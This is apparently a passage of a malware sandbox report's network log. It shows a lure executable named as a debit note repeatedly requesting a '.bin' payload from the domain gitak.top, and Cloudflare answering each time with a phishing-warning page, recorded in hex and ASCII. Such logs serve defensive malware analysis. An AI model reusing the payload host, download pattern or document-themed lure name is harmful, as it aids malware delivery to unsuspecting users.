                              2024-08-26 13:38:01 UTC1369INData Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 79 45 31 6b 42 41 70 47 61 4d 4b 4b 54 30 53 34 38 37 62 66 45 73 5f 43 4f 4e 32 66 58 69 49 34 62 44 48 4b 76 59 78 4e 50 76 38 2d 31 37 32 34 36 37 39 34 38 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79
                              Data Ascii: <input type="hidden" name="atok" value="yE1kBApGaMKKT0S487bfEs_CON2fXiI4bDHKvYxNPv8-1724679481-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
                              2024-08-26 13:38:01 UTC850INData Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f
                              Data Ascii: sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
                              2024-08-26 13:38:01 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              34192.168.11.2049851172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:38:11 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:38:11 UTC535INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:38:11 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QsNCW4gRwUSlIQbxkwWiFeJGTx0gqdvj674qNTdW%2FxD5PCCJ3ujAw4kamD7pHrq88dsnrpSp6KYd0aP5y9QCK6MhptqtOGVM76NW5WwjB1j2I3NlFJ3adnulxoM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9438863db7081e-IAD
                              2024-08-26 13:38:11 UTC834INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:38:11 UTC1369INData Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20
                              Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:38:11 UTC1369INData Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 34 71 68 30 79 52 2e 39 63 45 73 48 68 42 46 34 48 6d 48 78 4d 61 48 55 42 5f 36 49 39 73 69 64 77 52 41 33 72 74 36 65 70 54 59 2d 31 37 32 34 36 37 39 34 39 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22
                              Data Ascii: ut type="hidden" name="atok" value="4qh0yR.9cEsHhBF4HmHxMaHUB_6I9sidwRA3rt6epTY-1724679491-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
                              2024-08-26 13:38:11 UTC846INData Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f
                              Data Ascii: idden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
                              2024-08-26 13:38:11 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              35192.168.11.2049852172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:38:21 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:38:22 UTC543INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:38:22 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wt%2BLPGWr64VRBnYXx1rfq2u0rAv3PVGjWvdMIvxhmfUnkdvaG3DwlVVL%2Ffb6W%2FbwIa56F%2Frfn439GWqxpGi1tyGTxIMMJxpGosRhgsLNQGuCspcDnLOEefh%2F30o%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b9438c7de3f0780-IAD
                              2024-08-26 13:38:22 UTC826INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:38:22 UTC1369INData Raw: 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74
                              Data Ascii: s.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert
                              2024-08-26 13:38:22 UTC1369INData Raw: 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 51 69 43 33 68 30 65 63 32 38 39 30 78 6b 47 4f 39 63 4f 56 31 73 50 46 33 35 63 71 38 4d 4e 65 58 47 36 56 4f 67 35 55 33 45 49 2d 31 37 32 34 36 37 39 35 30 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22
                              Data Ascii: <input type="hidden" name="atok" value="QiC3h0ec2890xkGO9cOV1sPF35cq8MNeXG6VOg5U3EI-1724679502-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
                              2024-08-26 13:38:22 UTC854INData Raw: 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61
                              Data Ascii: tor sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfla
                              2024-08-26 13:38:22 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              36192.168.11.2049853172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:38:32 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:38:32 UTC535INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:38:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jSHOGbnUJyzMuiz4mdD9Fx1SosZZ45ci6ZqbDMDOLo25GSuSowpFT4ekfUBMtG42ytFX%2FvxGtcFzymkHIdgBbyPlWBCdClcR46MaC6a1D1HPqC6x6UblvVvI9wI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b943909789dc57b-IAD
                              2024-08-26 13:38:32 UTC834INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:38:32 UTC1369INData Raw: 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 20 20
                              Data Ascii: " /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
                              2024-08-26 13:38:32 UTC1369INData Raw: 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 4f 68 6c 32 41 66 4f 69 37 6a 75 6d 32 63 43 74 53 38 41 4f 68 6a 6d 62 68 5a 68 6d 68 69 4e 33 72 53 63 6c 7a 59 34 6b 5f 32 41 2d 31 37 32 34 36 37 39 35 31 32 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22
                              Data Ascii: ut type="hidden" name="atok" value="Ohl2AfOi7jum2cCtS8AOhjmbhZhmhiN3rSclzY4k_2A-1724679512-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="
                              2024-08-26 13:38:32 UTC846INData Raw: 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f
                              Data Ascii: idden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></
                              2024-08-26 13:38:32 UTC5INData Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              37192.168.11.2049854172.67.207.2194435076C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe
                              TimestampBytes transferredDirectionData
                              2024-08-26 13:38:42 UTC168OUTGET /KGukxUu155.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: gitak.top
                              Cache-Control: no-cache
                              2024-08-26 13:38:43 UTC541INHTTP/1.1 200 OK
                              Date: Mon, 26 Aug 2024 13:38:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Frame-Options: SAMEORIGIN
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j1%2B5MXVbnXxFgKu9dejjMXzX1AHNT6SaJ3Y1iUE0su6gxOQlNUQ4%2FrGrCHg7MTuYtoVZOgQE%2FONJGZdXk3tXI6mbjQd%2FgVdyTN6fYMNVHDNKJqWsRZTKBhnDSkI%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8b94394b0e019c2b-IAD
                              2024-08-26 13:38:43 UTC828INData Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                              Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                              2024-08-26 13:38:43 UTC1369INData Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29
                              Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
